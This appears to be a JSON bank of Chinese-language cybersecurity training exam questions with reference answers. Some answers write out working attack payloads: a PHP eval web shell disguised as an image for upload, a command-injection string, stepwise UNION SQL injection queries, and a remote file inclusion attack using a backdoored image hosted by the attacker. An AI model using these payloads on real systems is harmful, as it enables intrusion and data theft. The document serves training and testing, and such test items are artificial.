{
    "question_list": [
        {
            "id": 124,
            "question_type": "简答",
            "question_name": "阳泉国网培训网络安全",
            "question_text": "简述一句话木马的原理以及shell连接工具？并给出文件上传的思路。",
            "choice_text": null,
            "question_image_data": null,
            "difficulty_level": "middle",
            "description": "网络安全基础培训",
            "subject": "安全",
            "question_database": "2023阳泉国网考试试卷",
            "author": "申晏键",
            "score": "2.00",
            "reference_answer": "一句话木马本身是个程序，利用eval断言函数远程执行代码。\n如 <?php eval($_POST[‘cmd’]);?>\n服务端接受post型传参cmd的参数，当作代码字符串运行。在此过程中，我们会使用system(‘ls’)这类系统命令来执行对应的危险操作。\n\n比如上传图片处，我们将后门代码伪装作图片，绕过前端js的限制和后端的文件头、MIME类型检测、图像检查，然后找到上传的后门位置，使用shell工具连接即可。"
        },
        {
            "id": 125,
            "question_type": "简答",
            "question_name": "阳泉国网培训网络安全",
            "question_text": "简述命令执行的漏洞原理，给出攻击场景以及执行命令漏洞的思路和payload。",
            "choice_text": null,
            "question_image_data": null,
            "difficulty_level": "middle",
            "description": "网络安全基础培训",
            "subject": "安全",
            "question_database": "2023阳泉国网考试试卷",
            "author": "申晏键",
            "score": "2.00",
            "reference_answer": "是由于服务器执行命令但是过滤不严谨，攻击场景可举例靶场环境中的 ping ip 的问题，网站本身希望留存探活功能，输入ip然后ping，但实际payload 诸如  ping 127.0.0.256 || ifconfig 可以绕过服务器的原本本意的ping命令，执行自己的ifconfig等自己的系统命令。"
        },
        {
            "id": 318,
            "question_type": "单选",
            "question_name": "软件测试",
            "question_text": "UTM发展不是很好的原因在于（）",
            "choice_text": "本身不具备安防能力|功能被态势感知取代|对一切网络接入设备的统一管理功能对安全主管用处不大|可集成功能过多但本身性能跟不上",
            "question_image_data": null,
            "difficulty_level": "easy",
            "description": null,
            "subject": "软件测试",
            "question_database": "山西移动2021考试题库",
            "author": "高侃纯",
            "score": "4.00",
            "reference_answer": "D"
        },
        {
            "id": 387,
            "question_type": "单选",
            "question_name": "主机安全",
            "question_text": "下面哪个安全事件不属于APT组织的行为？",
            "choice_text": "护网行动中大量内网主机被红队getshell|有卧底潜伏在关键岗位秘密向境外发送特定数据|Google Aurora|震网病毒变种传播入移动内部进行破坏",
            "question_image_data": null,
            "difficulty_level": "easy",
            "description": null,
            "subject": "主机安全",
            "question_database": "山西移动2021考试题库",
            "author": "陈新",
            "score": "4.00",
            "reference_answer": "A"
        },
        {
            "id": 320,
            "question_type": "单选",
            "question_name": "软件测试",
            "question_text": "下面哪个程序不是常见的数据库？",
            "choice_text": "Mysql|Oracle|SqlMap|Sqlite",
            "question_image_data": null,
            "difficulty_level": "easy",
            "description": null,
            "subject": "软件测试",
            "question_database": "山西移动2021考试题库",
            "author": "高侃纯",
            "score": "4.00",
            "reference_answer": "C"
        },
        {
            "id": 130,
            "question_type": "单选",
            "question_name": "网络安全测试",
            "question_text": "下列哪个选项是IDS和IPS的区别",
            "choice_text": "串联与并联|可旁路部署|具备防病毒功能|属于流量层面的安全设备",
            "question_image_data": null,
            "difficulty_level": "easy",
            "description": null,
            "subject": "网络安全测试",
            "question_database": "山西移动2021考试题库",
            "author": "陈新",
            "score": "4.00",
            "reference_answer": "A"
        },
        {
            "id": 126,
            "question_type": "论述",
            "question_name": "阳泉国网培训网络安全",
            "question_text": "描述基于联合查询注入的SQL注入过程，给出每步详细的payload和思路简述。",
            "choice_text": null,
            "question_image_data": null,
            "difficulty_level": "hard",
            "description": "网络安全基础培训",
            "subject": "安全",
            "question_database": "2023阳泉国网考试试卷",
            "author": "申晏键",
            "score": "10.00",
            "reference_answer": "1.边界测试\nid 设置为 -1 1 100000000，看内容有什么回显\n2.判断漏洞点和注⼊类型\n判断数字型 id=1 and 1=1\n1 and 1=2 时间盲注 1 and sleep(5);--+\n字符型 1' and '1'='1 1' and '1'='2 时间盲注 1' and sleep(5)--+\n3.查列名\norder by\n4.联合查询\nunion select (列数填充满，)group_concat(table_schema,table_name) from information_schema.tables\n查字段名\nunion select (列数填充满，)group_concat(columu_name) from information_schema.columns\n5.直接查得数据\n\n获取库名\n/Less-1/?id=-1'+union+select+222,GROUP_CONCAT(DISTINCT+table_schema+SEPARATOR+',+'),4444+AS+concatenated_schemas+FROM+information_schema.columns%3b--+\n\n获取特定库的表名\n/Less-1/?id=-1' union select 222,GROUP_CONCAT(DISTINCT table_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security';-- \n\n获取特定库的特定表的字段名\n-1' union select 222,GROUP_CONCAT(DISTINCT column_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security' and table_name='users';-- "
        },
        {
            "id": 127,
            "question_type": "论述",
            "question_name": "阳泉国网培训网络安全",
            "question_text": "遇到文件包含场景漏洞题目，如何进行远程文件包含攻击？阐述攻击过程及原因。",
            "choice_text": null,
            "question_image_data": null,
            "difficulty_level": "hard",
            "description": "网络安全基础培训",
            "subject": "安全",
            "question_database": "2023阳泉国网考试试卷",
            "author": "申晏键",
            "score": "10.00",
            "reference_answer": "文件包含不需要考虑被包含的文件名的后缀，只需要文件中存在正常完整的php代码即可。\n构建有后门的1.php（手动传参的一句话后门）和正常的不大的图片1.jpg，使用windows命令 copy 1.jpg /b + 1.php /t muma.jpg，这样可以生成正常图片显示但是包含后门的muma.jpg图片，但是又可以绕过服务器的后端检测。\n本地利用phpstudy搭建网站，根目录下放置muma.jpg\n寻找目标系统的文件包含点，传参远程包含我们的 http://ip:port/muma.jpg\n对此url进行手动传参，执行自己构建的系统命令，如cmd=system(‘ifconfig’);。"
        }
    ]
}